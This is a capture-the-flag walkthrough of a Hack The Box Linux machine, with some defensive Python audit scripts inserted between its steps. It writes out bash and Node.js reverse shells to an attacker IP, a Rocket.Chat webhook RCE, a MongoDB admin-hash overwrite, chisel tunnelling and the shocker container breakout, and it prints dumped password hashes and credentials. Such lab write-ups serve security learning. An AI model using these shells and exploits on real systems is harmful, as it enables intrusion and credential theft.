Hack-The-Box-walkthrough[talkactive]

Introduction

OS: Linux
Difficulty: Hard
Points: 40
Release: 09 Apr 2022
IP: 10.10.11.155

  • my htb rank

Enumeration

NMAP

┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# nmap -sV -v -p- --min-rate=10000 10.10.11.155
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52
3000/tcp open ppp?
8080/tcp open http Tornado httpd 5.0
8081/tcp open http Tornado httpd 5.0
8082/tcp open http Tornado httpd 5.0

We found several web services:

  • Bolt CMS

  • jamovi 0.9.5.5

  • ROCKET.CHAT

Initial shell

Go to :8080 (jamovi), open the RJ editor and add this line; it runs a system command to get a shell:

system("bash -c 'bash -i >& /dev/tcp/10.10.14.18/9001 0>&1'",intern=TRUE)

We also found a .omv file in /root; just download and extract it and you will get credentials.

I used pwncat, which makes downloading and uploading files easy.

  • pwncat
(remote) root@b06821bbda78:/root# ls
Documents bolt-administration.omv
(local) pwncat$ download /root/bolt-administration.omv ./bolt-administration.omv
/root/bolt-administration.omv ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 2.2/2.2 KB • ? • 0:00:00
[09:41:08] downloaded 2.19KiB in 2.86 seconds

┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# file bolt-administration.omv
bolt-administration.omv: Zip archive data, at least v2.0 to extract, compression method=deflate
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# unzip bolt-administration.omv
Archive: bolt-administration.omv
inflating: META-INF/MANIFEST.MF
inflating: meta
inflating: index.html
inflating: metadata.json
inflating: xdata.json
inflating: data.bin
inflating: 01 empty/analysis
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# cat xdata.json | jq .
{
"A": {
"labels": [
[
0,
"Username",
"Username",
false
],
[
1,
"matt@talkative.htb",
"matt@talkative.htb",
false
],
[
2,
"janit@talkative.htb",
"janit@talkative.htb",
false
],
[
3,
"saul@talkative.htb",
"saul@talkative.htb",
false
]
]
},
"B": {
"labels": [
[
0,
"Password",
"Password",
false
],
[
1,
"jeO09ufhWD<s",
"jeO09ufhWD<s",
false
],
[
2,
"bZ89h}V<S_DA",
"bZ89h}V<S_DA",
false
],
[
3,
")SQWGm>9KHEA",
")SQWGm>9KHEA",
false
]
]
},
"C": {
"labels": []
}
}
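As an added example (not part of the original post), here is a small scanner for the xdata.json found inside a jamovi .omv archive: it reads each column's labels and flags any column whose first label (the imported header row) names a secret. This is the check a defender would run before a dataset like this is exported or shared. The sample JSON is constructed with placeholder values in the same layout as the file above, and scan_omv is a hypothetical helper name.

```python
import json
import zipfile
from typing import Dict, List

# Constructed sample mirroring the layout of the xdata.json extracted above:
# each column key maps to a "labels" list of [code, value, display, pinned].
# The values are placeholders, not the ones recovered from the box.
SAMPLE_XDATA = json.dumps({
    "A": {"labels": [[0, "Username", "Username", False],
                     [1, "user1@example.invalid", "user1@example.invalid", False],
                     [2, "user2@example.invalid", "user2@example.invalid", False]]},
    "B": {"labels": [[0, "Password", "Password", False],
                     [1, "placeholder-pw-1", "placeholder-pw-1", False],
                     [2, "placeholder-pw-2", "placeholder-pw-2", False]]},
    "C": {"labels": []},
})

# Header words that indicate a column holds secrets in plaintext.
SECRET_WORDS = ("password", "passwd", "secret", "token", "api_key", "apikey")


def column_values(xdata_text: str) -> Dict[str, List[str]]:
    """Return {column_key: [label text in code order]} from an xdata.json body."""
    data = json.loads(xdata_text)
    out: Dict[str, List[str]] = {}
    for key, col in data.items():
        labels = sorted(col.get("labels", []), key=lambda lab: lab[0])
        out[key] = [lab[1] for lab in labels]
    return out


def credential_columns(xdata_text: str) -> Dict[str, List[str]]:
    """Columns whose first label looks like a secret header; values follow it."""
    hits: Dict[str, List[str]] = {}
    for key, values in column_values(xdata_text).items():
        if values and any(w in values[0].lower() for w in SECRET_WORDS):
            hits[key] = values[1:]  # drop the header, keep the secret strings
    return hits


def scan_omv(path: str) -> Dict[str, List[str]]:
    """Hypothetical helper: a .omv is a zip, so read its xdata.json and scan it."""
    with zipfile.ZipFile(path) as zf:
        return credential_columns(zf.read("xdata.json").decode("utf-8"))


if __name__ == "__main__":
    for col, secrets in credential_columns(SAMPLE_XDATA).items():
        print(f"column {col}: {len(secrets)} plaintext secret(s) found")
```

The scan keys off the header text only, so a column of secrets with an innocuous header is missed; pairing it with an entropy or pattern check on the values themselves would close that gap.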

Now go to :80 at /bolt and log in with the creds:

admin:jeO09ufhWD<s

Now modify the bundles file at http://talkative.htb/bolt/file-edit/config?file=/bundles.php, add a PHP reverse shell, and you will get a shell in another container.

From that container, as www-data, SSH to the main host (ssh saul@172.18.0.1) with the same password as the bolt login.

┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# pwncat-cs -lp 1234
[09:52:38] Welcome to pwncat 🐈! __main__.py:164
[09:54:49] received connection from 10.10.11.155:60622 bind.py:84
[09:54:56] 0.0.0.0:1234: upgrading from /bin/dash to /bin/bash manager.py:957
[09:54:59] 10.10.11.155:60622: registered new host w/ db manager.py:957
(local) pwncat$ back
(remote) www-data@ad8ae3998918:/$ ls
bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var
(remote) www-data@ad8ae3998918:/$ ssh saul@172.18.0.1
The authenticity of host '172.18.0.1 (172.18.0.1)' can't be established.
ECDSA key fingerprint is SHA256:kUPIZ6IPcxq7Mei4nUzQI3JakxPUtkTlEejtabx4wnY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Could not create directory '/var/www/.ssh' (Permission denied).
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
saul@172.18.0.1's password:
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-81-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun 10 Apr 2022 01:56:50 PM UTC

System load: 0.0
Usage of /: 78.5% of 8.80GB
Memory usage: 70%
Swap usage: 2%
Processes: 392
Users logged in: 1
IPv4 address for br-ea74c394a147: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for eth0: 10.10.11.155
IPv6 address for eth0: dead:beef::250:56ff:feb9:3aae


18 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sun Apr 10 12:46:40 2022 from 172.17.0.13
saul@talkative:~$ id
uid=1000(saul) gid=1000(saul) groups=1000(saul)
saul@talkative:~$ whoami
saul
saul@talkative:~$ cat user.txt
e2503f45e99ee3fec7c7a4f44c5c87ed

And we get our user flag.

Move on to root

pspy found some interesting processes:

2022/04/09 21:31:01 CMD: UID=0 PID=79640 | /bin/sh -c cp /root/.backup/passwd /etc/passwd
2022/04/09 21:31:01 CMD: UID=0 PID=84170 | cp /root/.backup/shadow /etc/shadow
2022/04/09 21:51:01 CMD: UID=0 PID=84169 | python3 /root/.backup/update_mongo.py
2022/04/09 21:51:01 CMD: UID=0 PID=84172 | python3 /root/.backup/update_mongo.py
Listening sockets on the host:

tcp 0 0 172.17.0.1:6000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6001 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8081 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6002 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8082 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6003 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6004 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6005 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6006 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6007 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6008 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6009 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6010 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6011 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6012 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6013 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6014 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.17.0.1:6015 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.18.0.1:22 172.17.0.13:37184 ESTABLISHED keepalive (6455.50/0/0)
tcp6 0 0 :::8080 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::8081 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::8082 :::* LISTEN off (0.00/0/0)
udp 0 0 127.0.0.1:39995 127.0.0.53:53 ESTABLISHED off (0.00/0/0)
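As an added example (not part of the original walkthrough), a small audit script that parses netstat output in the layout shown above and classifies each listening TCP socket by reachability: bound to all interfaces, to loopback, or to a Docker bridge address. The interface-to-address map is taken from the SSH login banner earlier on the page; the sample lines are constructed to mirror the output above.

```python
import ipaddress
from typing import Dict, List

# Constructed sample in the same column layout as the netstat output above
# (Proto Recv-Q Send-Q Local Foreign State Timer); not copied from the box.
SAMPLE_NETSTAT = """\
tcp 0 0 172.17.0.1:6000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 172.18.0.1:22 172.17.0.13:37184 ESTABLISHED keepalive (6455.50/0/0)
tcp6 0 0 :::8081 :::* LISTEN off (0.00/0/0)
udp 0 0 127.0.0.1:39995 127.0.0.53:53 ESTABLISHED off (0.00/0/0)
"""

# Interface addresses as printed in the SSH login banner on this page.
IFACES = {"10.10.11.155": "eth0", "172.17.0.1": "docker0", "172.18.0.1": "br-ea74c394a147"}
CONTAINER_IFACE_PREFIXES = ("docker", "br-")


def split_endpoint(endpoint: str):
    """'172.17.0.1:6000' -> ('172.17.0.1', 6000); ':::8081' -> ('::', 8081)."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port)


def classify_bind(host: str, ifaces: Dict[str, str]) -> str:
    """Label a bind address by who can reach it."""
    addr = ipaddress.ip_address(host)
    if addr.is_unspecified:        # 0.0.0.0 or :: -> every interface
        return "all-interfaces"
    if addr.is_loopback:           # 127.0.0.0/8 or ::1
        return "loopback"
    name = ifaces.get(host)
    if name is None:
        return "unknown"
    if name.startswith(CONTAINER_IFACE_PREFIXES):
        return "container-network"  # only containers on that bridge
    return "external"


def audit_listeners(netstat_text: str, ifaces: Dict[str, str]) -> List[dict]:
    """One row per TCP LISTEN socket; UDP and established sockets are skipped."""
    rows = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[0].startswith("tcp") or parts[5] != "LISTEN":
            continue
        host, port = split_endpoint(parts[3])
        rows.append({"proto": parts[0], "port": port, "bind": host,
                     "exposure": classify_bind(host, ifaces)})
    return rows


def exposed_ports(netstat_text: str, ifaces: Dict[str, str]) -> List[int]:
    """Ports a remote client could reach directly, sorted."""
    return sorted({r["port"] for r in audit_listeners(netstat_text, ifaces)
                   if r["exposure"] in ("all-interfaces", "external")})


if __name__ == "__main__":
    for row in audit_listeners(SAMPLE_NETSTAT, IFACES):
        print(f"{row['proto']:5} {row['bind']:>12}:{row['port']:<6} {row['exposure']}")
    print("exposed:", exposed_ports(SAMPLE_NETSTAT, IFACES))
```

A host-side listener list is not the same as external reachability: the nmap scan at the top of the page shows 3000 reachable from outside while the host only has 127.0.0.1:3000 listening, so forwarding rules and proxies have to be checked too, and an audit like this should be paired with an external scan.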

After scanning the Docker IP range and ports, we know where the services live. Now use chisel to port-forward MongoDB at 172.17.0.2:27017 and change the admin password for Rocket.Chat.

  • chisel
saul@talkative:~$ ./chisel client 10.10.14.18:4444 R:27017:172.17.0.2:27017 &
[1] 6493
saul@talkative:~$ 2022/04/10 14:13:52 client: Connecting to ws://10.10.14.18:4444

saul@talkative:~$ 2022/04/10 14:13:55 client: Connected (Latency 371.579937ms)
┌──(root💀kali)-[~/hackthebox/endgame/ascension]
└─# ./chisel server -p 4444 --reverse
2022/04/10 06:04:31 server: Reverse tunnelling enabled
2022/04/10 06:04:31 server: Fingerprint YV//bCvnlszVb4QzNq2stvLbKxLfQ33OQ4mKu6Y5zME=
2022/04/10 06:04:31 server: Listening on http://0.0.0.0:4444
2022/04/10 06:04:37 server: session#1: tun: proxy#R:27017=>172.17.0.2:27017: Listening

Now install mongosh to connect to MongoDB and enumerate some information:

$ wget https://downloads.mongodb.com/compass/mongodb-mongosh_1.3.1_amd64.deb
$ dpkg -i mongodb-mongosh_1.3.1_amd64.deb
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# mongosh "mongodb://LOCALHOST:27017"
Current Mongosh Log ID: 6252e6b51f6c27d3c8cfc72a
Connecting to: mongodb://LOCALHOST:27017/?directConnection=true&appName=mongosh+1.3.1
Using MongoDB: 4.0.26
Using Mongosh: 1.3.1

For mongosh info see: https://docs.mongodb.com/mongodb-shell/

------
The server generated these startup warnings when booting:
2022-04-10T12:32:16.345+0000:
2022-04-10T12:32:16.345+0000: ** WARNING: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine
2022-04-10T12:32:16.345+0000: ** See http://dochub.mongodb.org/core/prodnotes-filesystem
2022-04-10T12:32:18.390+0000:
2022-04-10T12:32:18.390+0000: ** WARNING: Access control is not enabled for the database.
2022-04-10T12:32:18.390+0000: ** Read and write access to data and configuration is unrestricted.
2022-04-10T12:32:18.391+0000:
------

rs0 [direct: primary] test> show databases
admin 106 kB
config 160 kB
local 11.9 MB
meteor 5.08 MB
rs0 [direct: primary] test> use admin
switched to db admin
rs0 [direct: primary] admin> show tables
system.keys
system.version
rs0 [direct: primary] admin> db.system.keys.find()
[
{
_id: Long("6994889321446637571"),
purpose: 'HMAC',
key: Binary(Buffer.from("6def3ebf131b6d0197852202f4908cf0f279016e", "hex"), 0),
expiresAt: Timestamp({ t: 1636400583, i: 0 })
},
{
_id: Long("6994889321446637572"),
purpose: 'HMAC',
key: Binary(Buffer.from("52057603cc02d6cf032aa2d1dc592ad3f8889b06", "hex"), 0),
expiresAt: Timestamp({ t: 1644176583, i: 0 })
},
{
_id: Long("7064639126477209602"),
purpose: 'HMAC',
key: Binary(Buffer.from("8d89fa517f7aaf2813b681aa0e63bcae2a3238cc", "hex"), 0),
expiresAt: Timestamp({ t: 1652640475, i: 0 })
},
{
_id: Long("7064639126477209603"),
purpose: 'HMAC',
key: Binary(Buffer.from("ede2184b2b29a5eb05cca53adb9246b73dc3c90f", "hex"), 0),
expiresAt: Timestamp({ t: 1660416475, i: 0 })
}
]
rs0 [direct: primary] admin> use meteor
switched to db meteor
rs0 [direct: primary] meteor> db.users.find()
[
{
_id: 'rocket.cat',
createdAt: ISODate("2021-08-10T19:44:00.224Z"),
avatarOrigin: 'local',
name: 'Rocket.Cat',
username: 'rocket.cat',
status: 'online',
statusDefault: 'online',
utcOffset: 0,
active: true,
type: 'bot',
_updatedAt: ISODate("2021-08-10T19:44:00.615Z"),
roles: [ 'bot' ]
},
{
_id: 'ZLMid6a4h5YEosPQi',
createdAt: ISODate("2021-08-10T19:49:48.673Z"),
services: {
password: {
bcrypt: '$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG'
},
resume: {
loginTokens: [
{
when: ISODate("2022-04-10T13:00:11.904Z"),
hashedToken: 'n3ZC1SRtuFsYyAAcaelzbdMkwWv7bI4IONsiahBenNI='
}
]
}
},
emails: [ { address: 'saul@talkative.htb', verified: false } ],
type: 'user',
status: 'offline',
active: true,
_updatedAt: ISODate("2022-04-10T13:59:52.416Z"),
roles: [ 'admin', 'bot' ],
name: 'Saul Goodman',
lastLogin: ISODate("2022-04-10T13:00:11.897Z"),
statusConnection: 'offline',
username: 'admin',
utcOffset: 0
}
]

Now we can update the admin's bcrypt hash to change the password:

rs0 [direct: primary] meteor> db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$n9CM8OgInDlwpvjLKLPML.eizXIzLlRtgCh3GRLafOdR9ldAUh/KG" } } } })
DeprecationWarning: Collection.update() is deprecated. Use updateOne, updateMany, or bulkWrite.
{
acknowledged: true,
insertedId: null,
matchedCount: 1,
modifiedCount: 1,
upsertedCount: 0
}

Then log in to the Rocket.Chat panel with admin/12345.

The target runs Rocket.Chat 2.4.14, which is vulnerable:

  • Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)

  • CVE-2021-22911

We can change the following into a reverse shell:

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('command here');
const require = console.log.constructor('return process.mainModule.require')();
var net = require("net"), cp = require("child_process"), sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1234, "10.10.14.18", function(){
    client.pipe(sh.stdin);
    sh.stdout.pipe(client);
    sh.stderr.pipe(client);
});

Then go to http://talkative.htb:3000/admin/integrations/new and select “Incoming WebHook Integration”.

Fill in the form as in the following screenshots:

Then copy the webhook URL and curl it; we get a shell in a container again.

┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# curl http://talkative.htb:3000/hooks/23fvWJGcJ7b47SGHy/PWHLFZoXrTQLpM5fT2GMzAgxBNhXKD7k3QD3K8nkHcXWAkEZ
{"success":false}
┌──(root💀kali)-[~/hackthebox/machine/talkactive]
└─# pwncat-cs -lp 1234
[10:45:00] Welcome to pwncat 🐈! __main__.py:164
[10:45:08] received connection from 10.10.11.155:46286 bind.py:84
[10:45:16] 0.0.0.0:1234: upgrading from /bin/dash to /bin/bash manager.py:957
[10:45:20] 10.10.11.155:46286: registered new host w/ db manager.py:957
(local) pwncat$ back
(remote) root@c150397ccd63:/app/bundle/programs/server# ls
app boot.js.map mini-files.js.map npm-rebuild.js npm-shrinkwrap.json program.json
assets config.json node_modules npm-rebuild.js.map package.json runtime.js
boot-utils.js debug.js npm npm-rebuilds.json packages runtime.js.map
boot-utils.js.map debug.js.map npm-rebuild-args.js npm-require.js profile.js server-json.js
boot.js mini-files.js npm-rebuild-args.js.map npm-require.js.map profile.js.map server-json.js.map
(remote) root@c150397ccd63:/app/bundle/programs/server# id
uid=0(root) gid=0(root) groups=0(root)
(remote) root@c150397ccd63:/app/bundle/programs/server# whoami
root

After running a Linux enumeration script, we found the container has the cap_dac_read_search capability.
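As an added audit helper (not from the walkthrough and not from the shocker PoC), this decodes the CapEff mask that /proc/<pid>/status reports and flags capabilities that let a process reach outside its container, CAP_DAC_READ_SEARCH among them. The sample status text is constructed: 00000000a80425fb is Docker's default capability set, which does not include CAP_DAC_READ_SEARCH, and the second sample adds that single bit, as a container started with --cap-add would have it.

```python
from typing import Dict, List, Set

# Linux capability names indexed by bit number (include/uapi/linux/capability.h).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER", "CAP_FSETID",
    "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE",
    "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST", "CAP_NET_ADMIN", "CAP_NET_RAW",
    "CAP_IPC_LOCK", "CAP_IPC_OWNER", "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT",
    "CAP_SYS_PTRACE", "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD", "CAP_LEASE",
    "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP", "CAP_MAC_OVERRIDE",
    "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM", "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ",
    "CAP_PERFMON", "CAP_BPF", "CAP_CHECKPOINT_RESTORE",
]

# Capabilities that defeat the container boundary: reading any file on the host
# via open_by_handle_at (DAC_READ_SEARCH), mounts/namespaces (SYS_ADMIN),
# ptrace, kernel modules and raw device I/O.
WATCHLIST = {"CAP_DAC_READ_SEARCH", "CAP_SYS_ADMIN", "CAP_SYS_PTRACE",
             "CAP_SYS_MODULE", "CAP_SYS_RAWIO"}

# Constructed /proc/<pid>/status fragments. The first mask is Docker's default
# set; the second is the same set plus bit 2 (CAP_DAC_READ_SEARCH).
SAMPLE_DEFAULT = "Name:\tbash\nCapInh:\t0000000000000000\nCapPrm:\t00000000a80425fb\n" \
                 "CapEff:\t00000000a80425fb\nCapBnd:\t00000000a80425fb\n"
SAMPLE_ADDED = SAMPLE_DEFAULT.replace("a80425fb", "a80425ff")


def decode_caps(mask: int) -> Set[str]:
    """Turn a capability bitmask into the set of capability names it contains."""
    names: Set[str] = set()
    bit = 0
    while mask >> bit:
        if (mask >> bit) & 1:
            # Bits newer than this table are still reported, just without a name.
            names.add(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"CAP_{bit}")
        bit += 1
    return names


def parse_status(text: str) -> Dict[str, int]:
    """Extract the Cap* lines of a /proc/<pid>/status dump as integers."""
    caps: Dict[str, int] = {}
    for line in text.splitlines():
        if line.startswith("Cap"):
            key, _, val = line.partition(":")
            caps[key.strip()] = int(val.strip(), 16)
    return caps


def risky_caps(status_text: str) -> List[str]:
    """Watchlisted capabilities present in the effective set, sorted by name."""
    return sorted(decode_caps(parse_status(status_text)["CapEff"]) & WATCHLIST)


if __name__ == "__main__":
    with open("/proc/self/status") as f:
        print("risky effective caps for this process:", risky_caps(f.read()))
```

Running it inside a container is the quick version of the enumeration step above; running it over every container's init process from the host (or in CI against the compose/run flags that add capabilities) catches the misconfiguration before anything is deployed with it.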

  • shocker: docker PoC VMM-container breakout

First modify the file so it targets the path we want, then compile it on our attacking Kali machine:

// get a FS reference from something mounted in from outside
if ((fd1 = open("/etc/hostname", O_RDONLY)) < 0)
    die("[-] open");

if (find_handle(fd1, "/root/root.txt", &root_h, &h) <= 0)
    die("[-] Cannot find valid handle!");

  • Dynamic compilation

gcc shocker.c -o shocker

  • Static compilation

cc -Wall -std=c99 -O2 shocker.c -static

Then upload the binaries and execute them:

(local) pwncat$ upload ./a.out /root/static
/root/static ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 824.1/824.1 KB • ? • 0:00:00
[10:53:06] uploaded 824.11KiB in 13.93 seconds upload.py:76
(local) pwncat$ upload ./shocker /root/shocker
/root/shocker ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 17.2/17.2 KB • ? • 0:00:00
[10:53:48] uploaded 17.21KiB in 4.49 seconds upload.py:76
(local) pwncat$ upload ./shadow /root/shadow
/root/shadow ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 17.2/17.2 KB • ? • 0:00:00
[10:53:57] uploaded 17.21KiB in 4.49 seconds upload.py:76
(local) pwncat$ back
(remote) root@c150397ccd63:/root# chmod 777 *
(remote) root@c150397ccd63:/root# ./static
[***] docker VMM-container breakout Po(C) 2014 [***]
[***] The tea from the 90's kicks your sekurity again. [***]
[***] If you have pending sec consulting, I'll happily [***]
[***] forward to my friends who drink secury-tea too! [***]

<enter>

[*] Resolving 'root/root.txt'
[*] Found lib32
[*] Found ..
[*] Found lost+found
[*] Found sbin
[*] Found bin
[*] Found boot
[*] Found dev
[*] Found run
[*] Found lib64
[*] Found .
[*] Found var
[*] Found home
[*] Found media
[*] Found proc
[*] Found etc
[*] Found lib
[*] Found libx32
[*] Found cdrom
[*] Found root
[+] Match: root ino=18
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'root.txt'
[*] Found ..
[*] Found .backup
[*] Found .config
[*] Found .cache
[*] Found .local
[*] Found .ssh
[*] Found .
[*] Found .profile
[*] Found .bashrc
[*] Found root.txt
[+] Match: root.txt ino=110097
[*] Brute forcing remaining 32bit. This can take a while...
[*] (root.txt) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x11, 0xae, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x11, 0xae, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
99a37c0a5b01ffc4ad1204d0dd1bc884

(remote) root@c150397ccd63:/root# ./shadow
[***] docker VMM-container breakout Po(C) 2014 [***]
[***] The tea from the 90's kicks your sekurity again. [***]
[***] If you have pending sec consulting, I'll happily [***]
[***] forward to my friends who drink secury-tea too! [***]

<enter>

[*] Resolving 'etc/shadow'
[*] Found lib32
[*] Found ..
[*] Found lost+found
[*] Found sbin
[*] Found bin
[*] Found boot
[*] Found dev
[*] Found run
[*] Found lib64
[*] Found .
[*] Found var
[*] Found home
[*] Found media
[*] Found proc
[*] Found etc
[+] Match: etc ino=393217
[*] Brute forcing remaining 32bit. This can take a while...
[*] (etc) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x01, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00};
[*] Resolving 'shadow'
[*] Found modules-load.d
[*] Found lsb-release
[*] Found rsyslog.conf
[*] Found rc6.d
[*] Found calendar
[*] Found fstab
[*] Found shadow
[+] Match: shadow ino=393228
[*] Brute forcing remaining 32bit. This can take a while...
[*] (shadow) Trying: 0x00000000
[*] #=8, 1, char nh[] = {0x0c, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Got a final handle!
[*] #=8, 1, char nh[] = {0x0c, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00};
[!] Win! /etc/shadow output follows:
root:$6$9GrOpvcijuCP93rg$tkcyh.ZwH5w9AHrm66awD9nLzMHv32QqZYGiIfuLow4V1PBkY0xsKoyZnM3.AI.yGWfFLOFDSKsIR9XnKLbIY1:19066:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
sys:*:18659:0:99999:7:::
sync:*:18659:0:99999:7:::
games:*:18659:0:99999:7:::
man:*:18659:0:99999:7:::
lp:*:18659:0:99999:7:::
mail:*:18659:0:99999:7:::
news:*:18659:0:99999:7:::
uucp:*:18659:0:99999:7:::
proxy:*:18659:0:99999:7:::
www-data:*:18659:0:99999:7:::
backup:*:18659:0:99999:7:::
list:*:18659:0:99999:7:::
irc:*:18659:0:99999:7:::
gnats:*:18659:0:99999:7:::
nobody:*:18659:0:99999:7:::
systemd-network:*:18659:0:99999:7:::
systemd-resolve:*:18659:0:99999:7:::
systemd-timesync:*:18659:0:99999:7:::
messagebus:*:18659:0:99999:7:::
syslog:*:18659:0:99999:7:::
_apt:*:18659:0:99999:7:::
tss:*:18659:0:99999:7:::
uuidd:*:18659:0:99999:7:::
tcpdump:*:18659:0:99999:7:::
landscape:*:18659:0:99999:7:::
pollinate:*:18659:0:99999:7:::
usbmux:*:18849:0:99999:7:::
sshd:*:18849:0:99999:7:::
systemd-coredump:!!:18849::::::
lxd:!:18849::::::
saul:$6$19rUyMaBLt7.CDGj$ik84VX1CUhhuiMHxq8hSMjKTDMxHt.ldQC15vFyupafquVyonyyb3/S6MO59tnJHP9vI5GMvbE9T4TFeeeKyg1:19058:0:99999:7:::

Both the dynamically and statically compiled binaries work, and we are done.

Summary of knowledge

  • RJ editor: get a shell
  • pwncat: upload and download files
  • Bolt CMS: get a shell
  • chisel: port-forward the MongoDB 27017 port
  • update the admin's bcrypt hash to change the password
  • Rocket.Chat RCE
  • shocker: Docker PoC VMM-container breakout to get the root flag

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…